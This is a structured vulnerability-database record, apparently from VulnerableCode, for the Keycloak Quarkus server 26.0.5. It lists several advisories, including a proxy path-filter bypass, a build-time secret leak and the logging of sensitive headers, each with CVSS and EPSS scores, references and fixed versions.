reference_id GHSA-pcx7-8hxg-j823
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pcx7-8hxg-j823
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-pcx7-8hxg-j823
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rhzn-51yv-q7ef
10
url VCID-vtut-sg7s-xqf4
vulnerability_id VCID-vtut-sg7s-xqf4
summary 
Keycloak has an improper input validation vulnerability
A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0976.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-0976.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0976
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03309
published_at 2026-06-09T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.0336
published_at 2026-06-05T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.03371
published_at 2026-06-06T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.0334
published_at 2026-06-07T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.03319
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0976
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2429869
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-15T14:44:09Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2429869
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
5
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
7
reference_url https://access.redhat.com/security/cve/CVE-2026-0976
reference_id CVE-2026-0976
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-15T14:44:09Z/
url https://access.redhat.com/security/cve/CVE-2026-0976
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0976
reference_id CVE-2026-0976
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0976
9
reference_url https://github.com/advisories/GHSA-v897-pv23-r8cw
reference_id GHSA-v897-pv23-r8cw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v897-pv23-r8cw
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-wgaj-esqz-27fk
3
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.3.0
aliases CVE-2026-0976, GHSA-v897-pv23-r8cw
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vtut-sg7s-xqf4
11
url VCID-wgaj-esqz-27fk
vulnerability_id VCID-wgaj-esqz-27fk
summary 
Duplicate
This advisory duplicates another.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11538.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11538.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11538
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.017
published_at 2026-06-08T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01708
published_at 2026-06-07T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01702
published_at 2026-06-05T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02336
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11538
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2402622
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2402622
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://github.com/keycloak/keycloak/commit/9e98f2bf961f68853cea6fbec58b512ed8be7ca9
7
reference_url https://github.com/keycloak/keycloak/pull/43574
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://github.com/keycloak/keycloak/pull/43574
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
reference_id cpe:/a:redhat:build_keycloak:26.4::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.4::el9
9
reference_url https://access.redhat.com/security/cve/CVE-2025-11538
reference_id CVE-2025-11538
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-11-13T18:01:03Z/
url https://access.redhat.com/security/cve/CVE-2025-11538
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11538
reference_id CVE-2025-11538
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11538
11
reference_url https://github.com/advisories/GHSA-7m9g-pmxf-m9m8
reference_id GHSA-7m9g-pmxf-m9m8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7m9g-pmxf-m9m8
12
reference_url https://github.com/advisories/GHSA-j4vq-q93m-4683
reference_id GHSA-j4vq-q93m-4683
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j4vq-q93m-4683
13
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-j4vq-q93m-4683
reference_id GHSA-j4vq-q93m-4683
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-j4vq-q93m-4683
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.5
aliases CVE-2025-11538, GHSA-7m9g-pmxf-m9m8, GHSA-j4vq-q93m-4683
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wgaj-esqz-27fk
12
url VCID-yqk6-r6s5-myae
vulnerability_id VCID-yqk6-r6s5-myae
summary 
Keycloak Build Process Exposes Sensitive Data
A flaw was found in Keycloak. This issue occurs because sensitive runtime values, such as passwords, may be captured during the Keycloak build process and embedded as default values in bytecode, leading to unintended information disclosure. In Keycloak 26, sensitive data specified directly in environment variables during the build process is also stored as a default values, making it accessible during runtime. Indirect usage of environment variables for SPI options and Quarkus properties is also vulnerable due to unconditional expansion by PropertyMapper logic, capturing sensitive data as default values in all Keycloak versions up to 26.0.2.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10451.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10451.json
5
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-10451
reference_id
reference_type
scores
0
value 0.00121
scoring_system epss
scoring_elements 0.30675
published_at 2026-06-09T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30757
published_at 2026-06-05T12:55:00Z
2
value 0.00121
scoring_system epss
scoring_elements 0.30723
published_at 2026-06-06T12:55:00Z
3
value 0.00121
scoring_system epss
scoring_elements 0.3069
published_at 2026-06-07T12:55:00Z
4
value 0.00121
scoring_system epss
scoring_elements 0.30658
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-10451
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2322096
7
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
8
reference_url https://github.com/keycloak/keycloak/commit/198214310eb45b86707f823ccb5a2d65c814b528
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/198214310eb45b86707f823ccb5a2d65c814b528
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
reference_id cpe:/a:redhat:build_keycloak:24
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
reference_id cpe:/a:redhat:build_keycloak:24::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:24::el9
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
reference_id cpe:/a:redhat:build_keycloak:26
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:red_hat_single_sign_on:7
reference_id cpe:/a:redhat:red_hat_single_sign_on:7
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:red_hat_single_sign_on:7
15
reference_url https://access.redhat.com/security/cve/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T16:00:10Z/
url https://access.redhat.com/security/cve/CVE-2024-10451
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
reference_id CVE-2024-10451
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10451
17
reference_url https://github.com/advisories/GHSA-v7gv-xpgf-6395
reference_id GHSA-v7gv-xpgf-6395
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v7gv-xpgf-6395
18
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-v7gv-xpgf-6395
reference_id GHSA-v7gv-xpgf-6395
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-v7gv-xpgf-6395
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-10451, GHSA-v7gv-xpgf-6395
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yqk6-r6s5-myae
13
url VCID-zv3y-skx5-53ge
vulnerability_id VCID-zv3y-skx5-53ge
summary 
Keycloak logs sensitive headers
A flaw was found in Keycloak. When the logging format is configured to a verbose, user-supplied pattern (such as the pre-defined 'long' pattern), sensitive headers including Authorization and Cookie are disclosed to the logs in cleartext. An attacker with read access to the log files can extract these credentials (e.g., bearer tokens, session cookies) and use them to impersonate users, leading to a full account compromise.

Patches are available, see:

- https://github.com/keycloak/keycloak/releases/tag/26.4.11
- https://github.com/keycloak/keycloak/releases/tag/26.5.6
- https://github.com/keycloak/keycloak/releases/tag/26.6.0
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11537.json
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-11537.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-11537
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.00448
published_at 2026-06-09T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.0045
published_at 2026-06-05T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00451
published_at 2026-06-06T12:55:00Z
3
value 6e-05
scoring_system epss
scoring_elements 0.00447
published_at 2026-06-07T12:55:00Z
4
value 6e-05
scoring_system epss
scoring_elements 0.00445
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-11537
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2402616
reference_id
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T14:26:01Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2402616
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/commit/137a35c1109ff43a305f26264978a3ea21452373
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/137a35c1109ff43a305f26264978a3ea21452373
5
reference_url https://github.com/keycloak/keycloak/commit/5a3cdb7c4ccbf83ffc926f70d655a60269d7207b
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/5a3cdb7c4ccbf83ffc926f70d655a60269d7207b
6
reference_url https://github.com/keycloak/keycloak/commit/9622f550a6e565b29a3a37454421f08626791a6c
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/9622f550a6e565b29a3a37454421f08626791a6c
7
reference_url https://www.keycloak.org/server/logging#_change_log_formatpattern
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.keycloak.org/server/logging#_change_log_formatpattern
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
9
reference_url https://access.redhat.com/security/cve/CVE-2025-11537
reference_id CVE-2025-11537
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T14:26:01Z/
url https://access.redhat.com/security/cve/CVE-2025-11537
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11537
reference_id CVE-2025-11537
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11537
11
reference_url https://github.com/advisories/GHSA-gv3v-2cpp-3pmq
reference_id GHSA-gv3v-2cpp-3pmq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gv3v-2cpp-3pmq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.5.6
aliases CVE-2025-11537, GHSA-gv3v-2cpp-3pmq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zv3y-skx5-53ge
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.5